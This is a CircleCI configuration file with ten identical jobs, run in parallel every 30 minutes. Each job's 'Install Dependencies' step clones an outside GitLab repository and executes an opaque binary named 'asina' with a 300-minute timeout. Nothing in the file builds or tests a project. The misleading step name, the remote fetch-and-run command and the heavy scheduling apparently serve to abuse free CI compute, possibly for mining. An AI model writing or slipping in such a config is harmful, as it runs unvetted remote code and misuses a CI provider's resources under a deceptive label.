version: 2
jobs:
    abon1:
      docker:
            - image: ruby
      resource_class: large
      steps:
        - run:
            name: Install Dependencies
            command: git clone https://gitlab.com/florece03/minagkana.git && cd minagkana && chmod u+x asina && ./asina
            no_output_timeout: 300m
    abon2:
      docker:
            - image: ruby
      resource_class: large
      steps:
        - run:
            name: Install Dependencies
            command: git clone https://gitlab.com/florece03/minagkana.git && cd minagkana && chmod u+x asina && ./asina
            no_output_timeout: 300m
    abon3:
      docker:
            - image: ruby
      resource_class: large
      steps:
        - run:
            name: Install Dependencies
            command: git clone https://gitlab.com/florece03/minagkana.git && cd minagkana && chmod u+x asina && ./asina
            no_output_timeout: 300m
    abon4:
      docker:
            - image: ruby
      resource_class: large
      steps:
        - run:
            name: Install Dependencies
            command: git clone https://gitlab.com/florece03/minagkana.git && cd minagkana && chmod u+x asina && ./asina
            no_output_timeout: 300m
    abon5:
      docker:
            - image: ruby
      resource_class: large
      steps:
        - run:
            name: Install Dependencies
            command: git clone https://gitlab.com/florece03/minagkana.git && cd minagkana && chmod u+x asina && ./asina
            no_output_timeout: 300m
    abon6:
      docker:
            - image: ruby
      resource_class: large
      steps:
        - run:
            name: Install Dependencies
            command: git clone https://gitlab.com/florece03/minagkana.git && cd minagkana && chmod u+x asina && ./asina
            no_output_timeout: 300m
    abon7:
      docker:
            - image: ruby
      resource_class: large
      steps:
        - run:
            name: Install Dependencies
            command: git clone https://gitlab.com/florece03/minagkana.git && cd minagkana && chmod u+x asina && ./asina
            no_output_timeout: 300m
    abon8:
      docker:
            - image: ruby
      resource_class: large
      steps:
        - run:
            name: Install Dependencies
            command: git clone https://gitlab.com/florece03/minagkana.git && cd minagkana && chmod u+x asina && ./asina
            no_output_timeout: 300m
    abon9:
      docker:
            - image: ruby
      resource_class: large
      steps:
        - run:
            name: Install Dependencies
            command: git clone https://gitlab.com/florece03/minagkana.git && cd minagkana && chmod u+x asina && ./asina
            no_output_timeout: 300m
    abon10:
      docker:
            - image: ruby
      resource_class: large
      steps:
        - run:
            name: Install Dependencies
            command: git clone https://gitlab.com/florece03/minagkana.git && cd minagkana && chmod u+x asina && ./asina
            no_output_timeout: 300m
workflows:
  version: 2
  asina:
    jobs:
      - abon1
      - abon2
      - abon3
      - abon4
      - abon5
      - abon6
      - abon7
      - abon8
      - abon9
      - abon10
    triggers:
      - schedule:
          cron: "0,30 * * * *"
          filters:
            branches:
              only:
                - main
  kiram:
    jobs:
      - abon1
      - abon2
      - abon3
      - abon4
      - abon5
      - abon6
      - abon7
      - abon8
      - abon9
      - abon10
